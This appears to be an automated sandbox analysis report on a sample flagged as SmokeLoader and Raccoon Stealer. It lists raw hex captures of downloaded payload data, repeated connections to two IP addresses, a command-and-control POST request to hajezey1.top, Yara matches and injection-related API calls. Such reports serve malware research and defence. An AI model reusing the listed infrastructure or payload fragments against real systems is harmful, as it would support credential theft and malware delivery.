40 77 9b c7 9b 84 e7 3d 66 f1 8a 64 b1 1d 30 12 51 8c 70 17 4b af 1f ba f6 f6 01 e8 e4 47 d7 ab 90 4e b1 54 55 a5 04 bd 1b 6f c7 cb 29 32 28 e7 5b 1e 54 ab 1e 26 7d 11 ee e3 ce 57 c3 62 79 e4 6b b5 5c 68 91 54 40 69 f3 2c fe a4 03 5b f3 1f e4 a6 f3 1a 9f 10 b9 d9 b0 99 07 99 8a cd e4 7f 74 39 50 6d 83 e2 cf e2 e5 84 0e 15 b0 79 8a c3 e0 2b b9 ce b9 01 7e 17 28 d2 0a 4c 1f d0 a1 aa 7a 8f f6 6b e3 cd d0 d9 37 40 80 e3 dc e7 52 86 20 2b c4 3a 96 4d f7 e7 17 3f fc 9f 7c 4d 9a 70 d4 03 43 a6 98 76 6e 0f ca 82 cf 25 2e 9f 96 ce ec 75 98 c3 e7 23 da af b8 30 4a 43 43 6c 76 02 62 18 5a 67 fa 40 8e af 88 c1 20 ab 33 25 7d da a9 c3 e8 c8 2f cb e2 09 e8 cb 23 1e ee 18 b8 77 b3 0e 93 81 19 13 88 b9 8c f5 18 97 52 b9 c1 ea 9e 13 e8 b8 4c 45 e1 f0 73 8d 43 d9 ed 07 b2 52 dc 1a 9e 8b 18 57 21 01 7d 42 03 81 96 7f d8 2e 27 9d df 3c 42 56 60 de 9e 73 0f b6 65 a2 25 1f 78 60 38 30 5f d6 a6 b8 78 fe b1 8e 98 6d 18 5e 32 d0 e9 f3 32 42 c2 39 16 12 47 0b e9 17 10 8d e3 51 20 b2 3d db 10 54 5a 17 1c 5c 5a 16 b3 19 5f 11 8f 69 f9 e4 39 2a 01 6e f1 fd 58 b3 dc 95 25 1c 90 53 72 5e 15 33 b5 01 82 e3 92 c2 01 6d 7e d3 85 bc 43 cf 76 62 93 45 e1 05 85 d4 9c 97 2e 60 10 3a 93 8b 94 e5 fe d6 ae 32 c8 6e d5 8d 4a ad fb 91 65 69 17 ee f3 af 84 ed 67 e1 a2 3a 84 aa 58 5d 1c 79 9b 37 67 d2 1f ad af ac d5 54 24 d1 e4 dd b2 3a 6a c0 8e ad 90 bb 9a 05 71 77 92 ae 0f 27 d1 9c 65 53 55 cd ab 48 63 36 cc

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Fri, 29 Oct 2021 18:51:02 GMTContent-Type: application/octet-streamContent-Length: 2828315Connection: keep-aliveLast-Modified: Wed, 01 Sep 2021 16:21:39 GMTETag: "612fa893-2b281b"Accept-Ranges: bytesData Raw: 50 4b 03 04 14 00 00 00 08 00 9a 7a 6e 4e 3c 09 f8 7b 72 d2 00 00 d0 69 01 00 0b 00 00 00 6e 73 73 64 62 6d 33 2e 64 6c 6c ec fd 7f 7c 14 d5 d5 38 00 cf ee 4e 92 0d 59 d8 05 36 18 24 4a 90 a0 d1 a0 06 16 24 31 80 d9 84 dd 44 20 b0 61 c9 2e 11 13 b4 6a 4c b7 56 f9 b1 43 b0 12 08 4e 02 3b 19 b7 f5 e9 a3 7d ec 2f ab f5 f1 e9 0f db a7 b6 b5 80 d5 ea 86 d8 24 f8 13 81 5a 2c 54 a3 52 bd 71 63 8d 92 86 45 63 e6 3d e7 dc 99 dd 0d da ef f7 fb be 7f bf f0 c9 ec cc dc 3b f7 9e 7b ee b9 e7 9e 73 ee b9 e7 d6 de 70 bf 60 11 04 41 84 3f 4d 13 84 83 02 ff 57 21 fc df ff e5 99 04 61 ca ec 3f 4e 11 9e ca 7e 65 ce 41 d3 ea 57 e6 ac 6f f9 fa b6 82 cd 5b ef ba 7d eb cd df 2c b8 e5 e6 3b ef bc 2b 5c f0 b5 db 0a b6 4a 77 16 7c fd ce 82 15 6b fd 05 df bc eb d6 db ae 9a 3c 79 52 a1 5e c6 45 07 6f 18 6e 78 73 d1 63 c6 9f ef d1 9f 3d 56 0f bf ed cf 2c fe e9 46 f8 ed bb fb cc 63 75 f4 bc e4 a7 1b e8 77 c1 4f fd f4 5b f2 d3 75 f0 7b cf d3 3c df 77 ff b8 f8 a7 37 50 19 8b 1f 7b 91 9e 4b 7e ea a6 df 45 f4 dd 77 ff f8 d2 63 fc f7 1a 7a 5e f7 f5 5b 5a b0 be 7f d7 36 9f 47 10 56 9b 32 84 e7 2b ba 6e 34 de 0d 08 97 cc c9 31 4d c9 11 2e 84 86 97 f0 77 7b 66 c3 bd 03 6e 4a 4c f8 e8 a0 7b b3 20 64 0a f4 9c fc 15 da 4d 84 e4 2b b6 98 20 b9 82 7f e4 10 84 d4 2f ff 29 b8 ce 24 58 21 b5 08 b2 f4 e3 cb 9b 4c c2 0e 4b 1a 60 ab 4d c2 91 8b e0 77 b3 49 f8 ef 4c 41 38 72 ad 49 58 ff 7f e8 a3 a2 72 d3 c4 be 04 38 37 98 ff 7d fe ab c2 b7 ed 08 c3 ef e9 3c bd 5d 17 72 b8 d3 ff 15 00 54 57 6d bd f5 e6 f0 cd 82 b0 62 36 2f 13 5f 0a 17 9b d2 b3 61 bd 15 57 f1 6c 42 02 db e0 33 11 6e 84 e5 5f ca 17 bb 6a eb b6 ad b7 08 02 6f eb 4d 7a 9d 15 5f 51 de d6 db ee b8 eb 16 81 da 8e 38 10 ac f0 bb e2 4b f9 2a 85 ff ff bf ff a7 7f f5 ea 90 bc ac c8 67 72 08 e1 4c b9 cd 2a 48 2e b5 d6 76 b6 fb 8b 84 36 5b 2a 92 bf e9 34 49 97 a8 dd 7b de 31 67 09 c2 3c 1c 02 3e 4d ca d3 24 47 9d 26 59 d9 8b d0 f7 f2 0b ce c6 1e 2d f7 a1 12 93 a3 4f 98 01 39 5c b1 c6 1e 2c 74 c8 e1 57 1b 6d ae 58 20 a8 b6 59 d5 33 ea 2a 87 e2 19 53 3c 23 7d 1e 22 85 3e cf 30 52 42 67 2c 9c 1d b2 6c 68 2e 73 8b e1 6f d8 0f b8 c5 e6 72 cf 70 38 13 ae 09 29 bf cf 33 82 1d 4b 0f 76 fb 01 93 eb 64 73 d9 8d 6e 33 14 2b 5d 07 8f f6 03 2b dc e3 ae c3 ed 6b 72 4d 75 01 5f 90 59 5c 82 a0 0e cb 2f 38 54 cf 18 96 0b af 06 26 0b 42 43 83 22 8d 75 8e da 3b be 0f 65 a9 6b 20 75 24 1e 81 cf 15 8f cd 7e 60 bd 7b 1c 21 ab 4d c8 09 f3 ae 5c 57 ac 59 a9 33 37 2b 6e 51 f5 5a 95 2a ab ea b1 c5 33 5c 47 15 bf 35 64 be a1 f8 90 5a 9f 68 56 4c cd ea 5a 1b 7c 6b 89 35 17 f7 ab 58 46 ac 59 1e cc 6c 56 56 57 9a d5 43 98 d8 7c bd fd 80 80 cf 62 fb aa 5c 93 5a 0f 95 87 6d 81 20 f3 03 30 f0 d4 d0 50 fe 46 38 7b 5d 90 55 11 70 da da 52 57 2c 6e 91 fb b5 4d 4d 1b d5 7f e8 c8 73 aa 1e c2 5f 40 b5 aa 3e 51 dd 08 20 8e a8

Source: unknown	TCP traffic detected without corresponding DNS query: 216.128.137.31
Source: unknown	TCP traffic detected without corresponding DNS query: 216.128.137.31
Source: unknown	TCP traffic detected without corresponding DNS query: 216.128.137.31
Source: unknown	TCP traffic detected without corresponding DNS query: 91.219.236.97
Source: unknown	TCP traffic detected without corresponding DNS query: 91.219.236.97
Source: unknown	TCP traffic detected without corresponding DNS query: 91.219.236.97
Source: unknown	TCP traffic detected without corresponding DNS query: 91.219.236.97
Source: unknown	TCP traffic detected without corresponding DNS query: 91.219.236.97
Source: unknown	TCP traffic detected without corresponding DNS query: 91.219.236.97
Source: unknown	TCP traffic detected without corresponding DNS query: 91.219.236.97
Source: unknown	TCP traffic detected without corresponding DNS query: 91.219.236.97
Source: unknown	TCP traffic detected without corresponding DNS query: 91.219.236.97
Source: unknown	TCP traffic detected without corresponding DNS query: 91.219.236.97
Source: unknown	TCP traffic detected without corresponding DNS query: 91.219.236.97
Source: unknown	TCP traffic detected without corresponding DNS query: 91.219.236.97
Source: unknown	TCP traffic detected without corresponding DNS query: 91.219.236.97
Source: unknown	TCP traffic detected without corresponding DNS query: 91.219.236.97
Source: unknown	TCP traffic detected without corresponding DNS query: 91.219.236.97
Source: unknown	TCP traffic detected without corresponding DNS query: 91.219.236.97
Source: unknown	TCP traffic detected without corresponding DNS query: 91.219.236.97
Source: unknown	TCP traffic detected without corresponding DNS query: 91.219.236.97
Source: unknown	TCP traffic detected without corresponding DNS query: 91.219.236.97
Source: unknown	TCP traffic detected without corresponding DNS query: 91.219.236.97
Source: unknown	TCP traffic detected without corresponding DNS query: 91.219.236.97
Source: unknown	TCP traffic detected without corresponding DNS query: 91.219.236.97
Source: unknown	TCP traffic detected without corresponding DNS query: 91.219.236.97
Source: unknown	TCP traffic detected without corresponding DNS query: 91.219.236.97
Source: unknown	TCP traffic detected without corresponding DNS query: 91.219.236.97
Source: unknown	TCP traffic detected without corresponding DNS query: 91.219.236.97
Source: unknown	TCP traffic detected without corresponding DNS query: 91.219.236.97
Source: unknown	TCP traffic detected without corresponding DNS query: 91.219.236.97
Source: unknown	TCP traffic detected without corresponding DNS query: 91.219.236.97
Source: unknown	TCP traffic detected without corresponding DNS query: 91.219.236.97
Source: unknown	TCP traffic detected without corresponding DNS query: 91.219.236.97
Source: unknown	TCP traffic detected without corresponding DNS query: 91.219.236.97
Source: unknown	TCP traffic detected without corresponding DNS query: 91.219.236.97
Source: unknown	TCP traffic detected without corresponding DNS query: 91.219.236.97
Source: unknown	TCP traffic detected without corresponding DNS query: 91.219.236.97
Source: unknown	TCP traffic detected without corresponding DNS query: 91.219.236.97
Source: unknown	TCP traffic detected without corresponding DNS query: 91.219.236.97
Source: unknown	TCP traffic detected without corresponding DNS query: 91.219.236.97
Source: unknown	TCP traffic detected without corresponding DNS query: 91.219.236.97
Source: unknown	TCP traffic detected without corresponding DNS query: 91.219.236.97
Source: unknown	TCP traffic detected without corresponding DNS query: 91.219.236.97
Source: unknown	TCP traffic detected without corresponding DNS query: 91.219.236.97
Source: unknown	TCP traffic detected without corresponding DNS query: 91.219.236.97
Source: unknown	TCP traffic detected without corresponding DNS query: 91.219.236.97
Source: unknown	TCP traffic detected without corresponding DNS query: 91.219.236.97
Source: unknown	TCP traffic detected without corresponding DNS query: 91.219.236.97
Source: unknown	TCP traffic detected without corresponding DNS query: 91.219.236.97

Source: unknown

HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://jaqhuuufk.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 250Host: hajezey1.top

Source: unknown	HTTPS traffic detected: 162.159.130.233:443 -> 192.168.2.4:49800 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.159.130.233:443 -> 192.168.2.4:49817 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected SmokeLoader

Show sources

Source: Yara match	File source: 11.2.9A4B.exe.2cc15a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.iwbavbe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.0.iwbavbe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.0.iwbavbe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.F7E3DjYJpC.exe.2d215a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.20BD.exe.2fa0e50.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.9A4B.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.3.20BD.exe.2fb0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.1.9A4B.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.20BD.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.1.F7E3DjYJpC.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.F7E3DjYJpC.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.0.iwbavbe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.iwbavbe.2bc15a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.F7E3DjYJpC.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 32.0.iwbavbe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 32.0.iwbavbe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.iwbavbe.2c515a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 32.0.iwbavbe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.F7E3DjYJpC.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.F7E3DjYJpC.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 32.1.iwbavbe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.1.iwbavbe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000018.00000002.888009215.0000000002C40000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.876148906.0000000004C51000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.873601079.0000000002FB0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.741479676.0000000000451000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000000.726672116.00000000044E1000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.807321223.0000000000460000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.807649884.00000000005A1000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.890437795.00000000047D1000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.741456691.0000000000420000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000003.845161453.0000000002FB0000.00000004.00000001.sdmp, type: MEMORY

Source: 3C84.exe, 00000017.00000002.1072827490.000000000115B000.00000004.00000020.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

E-Banking Fraud:

Yara detected Raccoon Stealer

Show sources

Source: Yara match	File source: 27.3.5483.exe.48d0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.3.5483.exe.48d0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000001B.00000003.879658236.00000000048D0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 5483.exe PID: 6408, type: MEMORYSTR

System Summary:

.NET source code contains very large array initializations

Show sources

Source: 31F4.exe.6.dr, ??????????????/_?????xptkvqfesn.cs

Large array initialization: _?????nacpgkwmie: array initializer size 208904

Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AC2E2C5	20_2_6AC2E2C5
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AC24AEF	20_2_6AC24AEF
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AC332A9	20_2_6AC332A9
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AC1FA2B	20_2_6AC1FA2B
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB9EBB0	20_2_6AB9EBB0
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AC123E3	20_2_6AC123E3
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AC0EB8A	20_2_6AC0EB8A
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6ABB8BE8	20_2_6ABB8BE8
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB9ABD8	20_2_6AB9ABD8
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB8A309	20_2_6AB8A309
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB8AB40	20_2_6AB8AB40
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB7B090	20_2_6AB7B090
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB8A830	20_2_6AB8A830
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB66800	20_2_6AB66800
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AC21002	20_2_6AC21002
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB98840	20_2_6AB98840
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB899BF	20_2_6AB899BF
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB84120	20_2_6AB84120
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB86E30	20_2_6AB86E30
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AC267E2	20_2_6AC267E2
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB92F70	20_2_6AB92F70
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AC24496	20_2_6AC24496
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB935D0	20_2_6AB935D0
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_6AB60D20	20_2_6AB60D20
Source: C:\Users\user\AppData\Local\Temp\3C84.exe	Code function: 23_2_011441F0	23_2_011441F0
Source: C:\Users\user\AppData\Local\Temp\3C84.exe	Code function: 23_2_01149390	23_2_01149390
Source: C:\Users\user\AppData\Local\Temp\3C84.exe	Code function: 23_2_01141280	23_2_01141280
Source: C:\Users\user\AppData\Local\Temp\3C84.exe	Code function: 23_2_01140520	23_2_01140520
Source: C:\Users\user\AppData\Local\Temp\3C84.exe	Code function: 23_2_01143590	23_2_01143590
Source: C:\Users\user\AppData\Local\Temp\3C84.exe	Code function: 23_2_0114DA80	23_2_0114DA80
Source: C:\Users\user\AppData\Local\Temp\3C84.exe	Code function: 23_2_01148DA0	23_2_01148DA0
Source: C:\Users\user\AppData\Local\Temp\3C84.exe	Code function: 23_2_01140DD0	23_2_01140DD0
Source: C:\Users\user\AppData\Local\Temp\3C84.exe	Code function: 23_2_01149F88	23_2_01149F88
Source: C:\Users\user\AppData\Local\Temp\3C84.exe	Code function: 23_2_01149380	23_2_01149380
Source: C:\Users\user\AppData\Local\Temp\3C84.exe	Code function: 23_2_01141278	23_2_01141278
Source: C:\Users\user\AppData\Local\Temp\3C84.exe	Code function: 23_2_01140510	23_2_01140510
Source: C:\Users\user\AppData\Local\Temp\3C84.exe	Code function: 23_2_0114DA47	23_2_0114DA47
Source: C:\Users\user\AppData\Local\Temp\3C84.exe	Code function: 23_2_01148D93	23_2_01148D93
Source: C:\Users\user\AppData\Local\Temp\3C84.exe	Code function: 23_2_01140DC0	23_2_01140DC0

Source: 2CF4.exe.6.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 2CF4.exe.6.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 20BD.exe.6.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 20BD.exe.6.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 20BD.exe.6.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 20BD.exe.6.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 20BD.exe.6.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 20BD.exe.6.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 20BD.exe.6.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: ssbavbe.6.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: ssbavbe.6.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: ssbavbe.6.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: ssbavbe.6.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: ssbavbe.6.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: ssbavbe.6.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: ssbavbe.6.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: C:\Windows\explorer.exe

Section loaded: taskschd.dll

Jump to behavior

Source: F7E3DjYJpC.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Source: 23.0.3C84.exe.b10000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 17.0.69B.exe.500000.2.unpack, type: UNPACKEDPE	Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 23.0.3C84.exe.b10000.2.unpack, type: UNPACKEDPE	Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 23.2.3C84.exe.b10000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 23.0.3C84.exe.b10000.1.unpack, type: UNPACKEDPE	Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 17.0.69B.exe.500000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 17.0.69B.exe.500000.3.unpack, type: UNPACKEDPE	Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 19.0.1254.exe.550000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 19.0.1254.exe.550000.1.unpack, type: UNPACKEDPE	Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 19.0.1254.exe.550000.2.unpack, type: UNPACKEDPE	Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 23.0.3C84.exe.b10000.3.unpack, type: UNPACKEDPE	Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 17.0.69B.exe.500000.1.unpack, type: UNPACKEDPE	Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 19.0.1254.exe.550000.3.unpack, type: UNPACKEDPE	Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: C:\Users\user\AppData\Local\Temp\3C84.exe, type: DROPPED	Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: C:\Users\user\AppData\Local\Temp\69B.exe, type: DROPPED	Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: C:\Users\user\AppData\Local\Temp\1254.exe, type: DROPPED	Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =

Source: C:\Users\user\AppData\Local\Temp\8a05076d-68b0-45fb-9c83-e8cf76f7fdb4\AdvancedRun.exe	Code function: String function: 0040B550 appears 50 times
Source: C:\Users\user\AppData\Roaming\iwbavbe	Code function: String function: 00420290 appears 40 times
Source: C:\Users\user\AppData\Roaming\iwbavbe	Code function: String function: 0041D120 appears 38 times
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: String function: 6ABBD08C appears 34 times
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: String function: 6AB6B150 appears 122 times

Source: C:\Users\user\Desktop\F7E3DjYJpC.exe	Code function: 4_2_0040185B Sleep,NtTerminateProcess,	4_2_0040185B
Source: C:\Users\user\Desktop\F7E3DjYJpC.exe	Code function: 4_2_00401866 Sleep,NtTerminateProcess,	4_2_00401866
Source: C:\Users\user\Desktop\F7E3DjYJpC.exe	Code function: 4_2_0040187A Sleep,NtTerminateProcess,	4_2_0040187A
Source: C:\Users\user\Desktop\F7E3DjYJpC.exe	Code function: 4_2_0040163B NtMapViewOfSection,	4_2_0040163B
Source: C:\Users\user\Desktop\F7E3DjYJpC.exe	Code function: 4_2_004018D3 NtTerminateProcess,	4_2_004018D3
Source: C:\Users\user\Desktop\F7E3DjYJpC.exe	Code function: 4_2_00401884 Sleep,NtTerminateProcess,	4_2_00401884
Source: C:\Users\user\Desktop\F7E3DjYJpC.exe	Code function: 4_2_00401888 NtTerminateProcess,	4_2_00401888
Source: C:\Users\user\Desktop\F7E3DjYJpC.exe	Code function: 4_2_0040156A NtMapViewOfSection,	4_2_0040156A
Source: C:\Users\user\Desktop\F7E3DjYJpC.exe	Code function: 4_2_004015DB NtMapViewOfSection,NtMapViewOfSection,	4_2_004015DB
Source: C:\Users\user\Desktop\F7E3DjYJpC.exe	Code function: 4_2_004017EA Sleep,NtTerminateProcess,	4_2_004017EA
Source: C:\Users\user\Desktop\F7E3DjYJpC.exe	Code function: 4_1_0040156A NtMapViewOfSection,	4_1_0040156A
Source: C:\Users\user\Desktop\F7E3DjYJpC.exe	Code function: 4_1_004015DB NtMapViewOfSection,NtMapViewOfSection,	4_1_004015DB
Source: C:\Users\user\Desktop\F7E3DjYJpC.exe	Code function: 4_1_0040163B NtMapViewOfSection,	4_1_0040163B
Source: C:\Users\user\AppData\Local\Temp\9A4B.exe	Code function: 12_2_0040185B Sleep,NtTerminateProcess,	12_2_0040185B
Source: C:\Users\user\AppData\Local\Temp\9A4B.exe	Code function: 12_2_00401866 Sleep,NtTerminateProcess,	12_2_00401866
Source: C:\Users\user\AppData\Local\Temp\9A4B.exe	Code function: 12_2_0040187A Sleep,NtTerminateProcess,	12_2_0040187A
Source: C:\Users\user\AppData\Local\Temp\9A4B.exe	Code function: 12_2_0040163B NtMapViewOfSection,	12_2_0040163B
Source: C:\Users\user\AppData\Local\Temp\9A4B.exe	Code function: 12_2_004018D3 NtTerminateProcess,	12_2_004018D3
Source: C:\Users\user\AppData\Local\Temp\9A4B.exe	Code function: 12_2_00401884 Sleep,NtTerminateProcess,	12_2_00401884
Source: C:\Users\user\AppData\Local\Temp\9A4B.exe	Code function: 12_2_00401888 NtTerminateProcess,	12_2_00401888
Source: C:\Users\user\AppData\Local\Temp\9A4B.exe	Code function: 12_2_0040156A NtMapViewOfSection,	12_2_0040156A
Source: C:\Users\user\AppData\Local\Temp\9A4B.exe	Code function: 12_2_004015DB NtMapViewOfSection,NtMapViewOfSection,	12_2_004015DB
Source: C:\Users\user\AppData\Local\Temp\9A4B.exe	Code function: 12_2_004017EA Sleep,NtTerminateProcess,	12_2_004017EA
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_0040181C Sleep,NtTerminateProcess,	20_2_0040181C
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_00402406 NtEnumerateKey,	20_2_00402406
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_00401F25 NtQuerySystemInformation,	20_2_00401F25
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_00401828 Sleep,NtTerminateProcess,	20_2_00401828
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Code function: 20_2_00402431 NtEnumerateKey,	20_2_00402431
